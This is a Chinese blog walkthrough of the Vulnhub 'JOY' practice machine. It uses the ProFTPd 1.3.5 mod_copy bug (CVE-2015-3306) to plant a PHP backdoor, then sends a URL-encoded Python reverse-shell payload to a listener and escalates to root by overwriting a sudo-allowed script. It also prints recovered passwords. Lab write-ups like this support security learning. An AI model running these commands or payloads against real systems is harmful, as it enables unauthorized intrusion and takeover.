JOY靶机

最新推荐文章于 2024-09-07 15:57:32 发布
最新推荐文章于 2024-09-07 15:57:32 发布
阅读量314 收藏 3
点赞数 4
文章标签: android php 服务器 运维 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71232352/article/details/141199218
版权

信息收集

1.查看靶机的mac地址,并将它的网络连接模式改成nat

2.主机发现

3.端口扫描

4.ftp匿名用户登录

5.查看他目录下的文件

6.发现一个directory目录并且尝试切换失败将他下载下来看看里边有什么

7.查看这个文件

8.从Ftp下载的directory文件中有个version_control文件,但是不知道文件内容,看是否可以用ProFTPd的拷贝漏洞将其内容拿到

site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control
quit

9.NMAP扫描时知道其服务为ProFTP,但是不知道版本,重新连接ftp,将刚才copy到upload目录下的文件拷贝到本地

9.查看这个文件

cat version_control

getshell

1.知道了ProFTPd的确切版本是proftpd 1.3.5,看有无漏洞

searchsploit proftpd 1.3.5 这个没有搜索出来
msfconsole
search proftpd 1.3.5

2.利用

use 0
show options
set rhosts 192.168.42.199
set sitepath  /var/www/tryingharderisjoy
run

3.发现利用不了寻找其他漏洞,找到github上的一个漏洞

https://github.com/t0kx/exploit-CVE-2015-3306

将他下载下来放到kali中,并利用他

python exploit.py --host 192.168.42.199 --port 21 --path "/var/www/tryingharderisjoy"

4.访问

http://192.168.42.199/backdoor.php?cmd=id

5.发现命令执行了,尝试反弹shell

http://192.168.42.128/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.42.199%22,5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22])%27

kali监听5555端口

6.反弹成功,查看权限

提权

1.将它设置为交互式shell

2.sudo提权

发现需要密码

3.查看目录下文件

4.在patricksecretsofjoy中发现了密码文件

patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

5.切换账户登录

su patrick
apollo098765

6.成功切换,sudo提权

可以看到在路径/home//patrick/script/test是免密的

7.编写脚本文件

echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test

kali执行语句并将他下载到ftp的upload目录下

put test

8.使用telnet切换路径

telnet 192.168.42.199 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test

9.然后通过sudo /home/patrick/script/test进行提权

提权成功

左提溜
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB Jupiter靶机 WriteUp
qq_58869808的博客
06-06 3728
Hackthebox Jupiter靶机
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
digitalworld.local: JOY靶机-Walkthrough
ins1ght的博客
10-02 638
通过FTP匿名账户获取directory,对其中的信息筛选后,确定version_control为线索。site cpto将version_control拷贝到FTP的upload文件夹,最终发现ProFTPD存在命令执行漏洞,成功getshell。之后发现了patrick用户的密码,切换用户后,发现了sudo权限的test。由于patrick没有test的写权限,于是先创建一个test,内容为/bin/sh,后用put test上传到upload文件夹中,最后使用site cpto覆盖原有test,提权。
joy靶机靶场渗透
qq_20032803的博客
02-14 633
1.扫描主机 nmap扫描主机 Nmap scan report for 192.168.100.132 Host is up (0.00034s latency). Not shown: 988 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143
JOY靶机复现
weixin_52956666的博客
08-19 230
从Ftp下载的directory文件中有个version_control文件,但是不知道文件内容,看是否可以用ProFTPd的拷贝漏洞将其内容拿到。发现了ProFTPd的版本是proftpd 1.3.5。将命令写入test,放到ftp的upload目录下。发现root用户无法登陆,登陆patrick用户。查看version_control文件。在github中找到一个漏洞,下载下来。发现有一个directory目录。点进去查看发现为ossec框架。设置靶机为NAT模式。生成交互式shell。
Vulnhub:Digitalworld.local (JOY)靶机
qq_43884092的博客
04-14 431
使用enum4linux枚举目标smb服务,发现两个系统用户,ftp可以匿名登陆,目录权限属主和树组都是ftp用户,猜测:访问的是ftp用户的家目录,upload目录中的directory文件内容,图中文件和目录权限version_control可能会有有用 的信息,复制version_control文件到/home/ftp/upload目录,msf模块exploit/unix/ftp/proftpd_modcopy_exec拿shell
Vulnhub Joy靶场 Walkthrough
RichardLuo
04-13 186
Vulnhub Joy Walkthrough
Vulnhub靶机 Digitalworld.local (JOY)
菜浪马废的博客
05-03 821
ftp可以任何人登录 查看一下 查看version_control文件 看见:proftpd 1.3.5
靶机渗透练习57-digitalworld.local:JOY
hirak0的博客
04-19 4100
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ Description Does penetration testing spark joy? If it does, this machine is for you. This machine is full of services, full of fun, but how many ways are there to align the stars? Perhaps
JOY 打靶渗透
m0_65112983的博客
08-05 630
JOY 打靶渗透
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
OWASP靶机、安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
安卓14(小米HyperOS)APP中修改用户头像时,APP闪退的问题(报错 ”Mutation of _data is not allowed.“)
一个AR程序猿的博客
09-02 545
安卓14(小米HyperOS)APP中修改用户头像时,APP闪退的问题java.lang.IllegalArgumentException: Mutation of _data is not allowed.
高德地图SDK Android版开发 10 InfoWindow
程序喵D的博客
09-06 1684
前文介绍高德地图添加Marker覆盖物的使用方法,Marker结合InfoWindow可展示更详尽的信息。本文将介绍以下内容:1. 使用SDK默认样式显示InfoWindow的方法;2. 自定义InfoWindow样式的方法。
攻防世界 Web_php_unserialize
最新发布
beiweixiaotian66的博客
09-07 307
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
安卓model转鸿蒙ets
琼小资的专栏
09-03 371
现在的android studio提供了java自动转kotlin的实现,非常方便。那android的java和kotlin有没有可能转成鸿蒙artts呢。先从最简单的model转换开始,把kotlin的model转成ets。本质上都是字符串文件,讲道理应该是可行的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值